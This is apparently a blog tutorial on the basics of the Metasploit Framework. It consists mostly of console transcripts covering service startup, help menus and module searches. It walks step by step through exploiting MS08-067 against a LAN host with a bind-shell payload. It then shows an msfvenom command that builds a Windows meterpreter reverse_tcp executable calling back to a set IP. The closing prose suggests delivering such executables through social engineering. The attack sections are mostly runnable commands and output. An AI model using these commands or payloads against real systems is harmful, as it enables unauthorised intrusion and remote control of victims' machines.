Learn the basics of Metasploit Framework in 5 minutes !!

Metasploit is the one of the most famous framework for pentesters to expose the vulnerabilities to their client. Metasploit consisting of exploits and payloads for the different operating system. One can trust the payload and exploits in the metasploit as it won't attack the pentester machine at any cost.

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. (Wiki)

Learn the basics of Metasploit Framework in 5 minutes !! #To explore the metasploit framework cd /usr/share/metasploit-framework/ #To explore the modules cd modules/ #To explore the available exploits cd exploits/ #Before using the metasploit start the Postgres SQL database which will use to track what you do service postgresql start #Start the Metasploit remote procedure call (RPC) server and also the web server service metasploit start Creating metasploit database user 'msf3'... Creating metasploit database 'msf3'... insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5). insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6). [ ok ] Starting Metasploit rpc server: prosvc. [ ok ] Starting Metasploit web server: thin. [ ok ] Starting Metasploit worker: worker. #before opening - update the framework msfupdate [*] [*] Attempting to update the Metasploit Framework... [*] [*] Checking for updates via the APT repository [*] Note: expect weekly(ish) updates using this method ..... snip ....... #Open msfconsole using the terminal msfconsole [*] Starting the Metasploit Framework console.../ MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM http://metasploit.pro Taking notes in notepad? Have Metasploit Pro track & report your progress and findings -- learn more on http://rapid7.com/metasploit =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0:-) + -- --=[ 1387 exploits - 777 auxiliary - 222 post ] + -- --=[ 342 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > msf > help Core Commands ============= Command Description ------- ----------- ? Help menu back Move back from the current context banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host edit Edit the current module with $VISUAL or $EDITOR exit Exit the console go_pro Launch Metasploit web GUI grep Grep the output of another command help Help menu info Displays information about one or more module irb Drop into irb scripting mode jobs Displays and manages jobs kill Kill a job load Load a framework plugin loadpath Searches for and loads modules from a path makerc Save commands entered since start to a file popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack quit Exit the console reload_all Reloads all modules from all defined module paths resource Run the commands stored in a file route Route traffic through a session save Saves the active datastores search Searches module names and descriptions sessions Dump session listings and display information about sessions set Sets a variable to a value setg Sets a global variable to a value show Displays modules of a given type, or all modules sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more variables unsetg Unsets one or more global variables use Selects a module by name version Show the framework and console library version numbers Database Backend Commands ========================= Command Description ------- ----------- creds List all credentials in the database db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces msf > msf > help services Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...] -a,--add Add the services instead of searching -d,--delete Delete the services instead of searching -c Only show the given columns -h,--help Show this help information -s Search for a list of service names -p Search for a list of ports -r Only show [tcp|udp] services -u,--up Only show services which are up -o Send output to a file in csv format -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by Available columns: created_at, info, name, port, proto, state, updated_at msf > msf > version Framework: 4.11.0-2014122301 Console : 4.11.0-2014122301.15168 msf > msf > msf > resource Usage: resource path1 [path2 ...] Run the commands stored in the supplied files. Resource files may also contain ruby code between tags. See also: makerc msf > msf > route Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local. msf > sessions Active sessions =============== No active sessions. msf > msf > search ms08-067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption msf > msf > info exploit/windows/smb/ms08_067_netapi Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption Module: exploit/windows/smb/ms08_067_netapi Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2008-10-28 Provided by: hdm Brett Moore frank2 jduck Available targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload information: Space: 400 Avoid: 8 characters Description: This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development. References: http://cvedetails.com/cve/2008-4250/ http://www.osvdb.org/49243 http://technet.microsoft.com/en-us/security/bulletin/MS08-067 http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos msf > msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set RHOST 192.168.1.76 RHOST => 192.168.1.76 msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.76 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) msf exploit(ms08_067_netapi) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop ... snip ..... msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp payload => windows/shell/bind_tcp msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.76 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) LPORT 4444 yes The listen port RHOST 192.168.1.76 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set LPORT 1234 LPORT => 1234 msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > exploit [*] Started bind handler BOOM BOOM msf exploit(ms08_067_netapi) > msf exploit(ms08_067_netapi) > back msf > msf > msf > #Help msfvenom -h #To list all payloads msfvenom -l payloads #To list all encoders msfvenom -l encoders #To get the different formats msfvenom --help-formats #Syntax msfvenom -p [payloads] -o [options] #Example for creating .exe exploit for windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=12345 -f exe > win_exploit.exe

Metaslpoit have msfconsole (text-based console to exploit), msfcli (command line interface) and msfvenom (to get the payloads in different executable formats) Meterpreter is the text-based console with lots of hacking programs like keyloggers, sreenshot, hashdump etc., used after exploiting it.

msfcli is deprecated. It is appreciated to use the msfconsole. msfvenom is used to make the vulnerable executable to be executed in the target machine. Easiest way to deliver the executable is the social engineering and the famous areas are the server for delivering is /var/www/exploit/ :

Metasploit is the real fun for doing hacking.

Developer Notes

Search This Blog

Learn the basics of Metasploit Framework in 5 minutes !!

Comments

Post a Comment